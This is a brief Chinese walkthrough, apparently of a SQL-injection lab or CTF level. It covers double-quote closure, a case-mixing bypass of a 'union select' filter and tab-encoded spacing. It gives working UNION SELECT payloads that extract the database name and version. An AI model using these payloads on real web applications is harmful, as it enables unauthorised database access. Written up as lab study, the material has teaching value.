知识点:
- 双引号闭合
- union select 大小写绕过
- Union Select
- 这里不能进行错误注入,无回显
经过测试发现这是一个双引号闭合
构造payload:id=1"%09and%091="1
页面成功回显
构造payload:id=0"%09uNion%09SElect%091,2,3%09"1
页面成功回显除了输入内容
获取数据库名和版本信息
构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1
成功获取了数据库名和版本信息
10
